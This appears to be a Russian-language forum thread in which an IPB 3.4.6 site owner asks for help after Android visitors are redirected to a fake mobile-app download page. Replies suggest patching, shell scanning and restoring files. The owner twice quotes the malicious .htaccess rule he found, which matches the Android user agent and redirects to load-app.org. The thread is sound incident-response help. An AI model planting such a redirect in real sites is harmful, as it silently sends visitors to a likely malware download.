Перейти к содержанию

Вирус на сайте. Прошу помощи!!


Catalo

Рекомендуемые сообщения

Сегодня при попытке зайти на сайт с мобильного телефона меня перекинуло на какой-то левый сайт с предложением скачать мобильную версию.

load-app.org/m/mobile_version=ClearRu - вот адрес того левого сайта. Проверил другие форумы на своей учетки (еще 3) - и там тоже самое!! Проверил с другого мобильника - тоже самое.

При этом на ПК все отлично работает, проблема с сайтом только на мобильных устройствах.

Версия форумов везде 3.4.6, с момента выхода этой версии ipb ничего не обновлял, каюсь, вижу что уже 3.4.7 есть.. Подскажите как теперь действовать, как убрать этот вирус в срочном порядке.

Мой сайт: jcbforum.ru

ХЕЛП!!!

Ссылка на комментарий
Поделиться на другие сайты

Зашел на сайт через телефон , все гуд, кроме того что темы не открываются там ошибка

Ссылка на комментарий
Поделиться на другие сайты

IandroidFan,

ОГОГО как такое возможно??

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ __load-app.org/m/?mobile_version=CleanRu [L,R=302]

эта запись находилась в .htaccess


Зашел на сайт через телефон , все гуд, кроме того что темы не открываются там ошибка

как выяснилось только к андройду применимо...

Ссылка на комментарий
Поделиться на другие сайты

Кто и как залес к тебе в .htaccess ?

Ссылка на комментарий
Поделиться на другие сайты

'?do=embed' frameborder='0' data-embedContent>>

ОГОГО как такое возможно??
Либо не ставили патчи, либо поставили поздно.
Ссылка на комментарий
Поделиться на другие сайты

Сегодня при попытке зайти на сайт с мобильного телефона меня перекинуло на какой-то левый сайт с предложением скачать мобильную версию.

load-app.org/m/mobile_version=ClearRu - вот адрес того левого сайта. Проверил другие форумы на своей учетки (еще 3) - и там тоже самое!! Проверил с другого мобильника - тоже самое.

При этом на ПК все отлично работает, проблема с сайтом только на мобильных устройствах.

Версия форумов везде 3.4.6, с момента выхода этой версии ipb ничего не обновлял, каюсь, вижу что уже 3.4.7 есть.. Подскажите как теперь действовать, как убрать этот вирус в срочном порядке.

Мой сайт: jcbforum.ru

ХЕЛП!!!

Проблема с вашим смартфоном/телефоном, подобная ситуация возникала на одном из моих форумов, гвоздь ситуации был в том, что те кто использовал iPhone и смартфоны на Android попали в тоже положение что и вы. Обратился в Яндекс-поддержку, для проверки форума, ничего не обнаружили, я посоветовал пользователям форума проверить свои телефоны на наличие троянов/вирусов, оказалось, что у тех кого перекидывало по рекламной ссылке, сидел троян..

 

 

Ссылка на комментарий
Поделиться на другие сайты

.htaccess исправлен на всех сайтах на учетке, где лежат форумы. Т.е. и на сайтах на других движках. Но проблему с компом исключаю, т.к. постоянно работаю с другими учетками этого же хостинга, там нет форумов ipb и там все норм. Видимо через ipb зараза проникла.

 

Проблема с вашим смартфоном/телефоном, подобная ситуация возникала на одном из моих форумов, гвоздь ситуации был в том, что те кто использовал iPhone и смартфоны на Android попали в тоже положение что и вы. Обратился в Яндекс-поддержку, для проверки форума, ничего не обнаружили, я посоветовал пользователям форума проверить свои телефоны на наличие троянов/вирусов, оказалось, что у тех кого перекидывало по рекламной ссылке, сидел троян..

я уже выше написал в чем проблема, и она не в смартфоне. а в посторонней записи в htaccess.

 

 

 

'?do=embed' frameborder='0' data-embedContent>>

Либо не ставили патчи, либо поставили поздно.

спасибо за ссылку, только там так и не написали где искать злочасный шелл..

Ссылка на комментарий
Поделиться на другие сайты

спасибо за ссылку, только там так и не написали где искать злочасный шелл..
Можете айболитом воспользоваться.
Ссылка на комментарий
Поделиться на другие сайты

Catalo, обновись до 3.4.7 и проблемы исчезнут

Ссылка на комментарий
Поделиться на другие сайты

Catalo, обновись до 3.4.7 и проблемы исчезнут

С чего бы? Если где-то сидит файл (а может и больше одного), который добавляет/изменяет код, то обновление не поможет.

Ссылка на комментарий
Поделиться на другие сайты

Можете айболитом воспользоваться.

в общем попробую и обновится, и айболитом воспользоваться.. как бы хуже не сделать только...

у меня была уже эпопея с шелами, времен еще 3.3 версии ipb - это кошмар какой-то)

потому и спрашиваю совета, может у кого инструкция есть как действовать..

Ссылка на комментарий
Поделиться на другие сайты

С чего бы? Если где-то сидит файл (а может и больше одного), который добавляет/изменяет код, то обновление не поможет.

Да, конечно, заражённые файлы придётся чистить. Я сканировал антивирем по файлам сервера, в каждом форуме был шелл, помогла чистка файлов + обновление (применение патчей)

Ссылка на комментарий
Поделиться на другие сайты

IandroidFan,

ОГОГО как такое возможно??

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ __load-app.org/m/?mobile_version=CleanRu [L,R=302]

эта запись находилась в .htaccess

как выяснилось только к андройду применимо...

Запроси у хостера все изменения в файлах php на сервере,например за последнюю неделю!

У них такая возможность есть.Вот от этого и отталкивайся.

Ссылка на комментарий
Поделиться на другие сайты

базу данных чистить не надо?

с файлами разбирусь

Ссылка на комментарий
Поделиться на другие сайты

Нет, базу трогать не нужно

Ссылка на комментарий
Поделиться на другие сайты

откатил файлы дор заражения и закинул туда новые картинки. вроде все хорошо, всем спасибо. пойду обновляться

Ссылка на комментарий
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
×
×
  • Создать...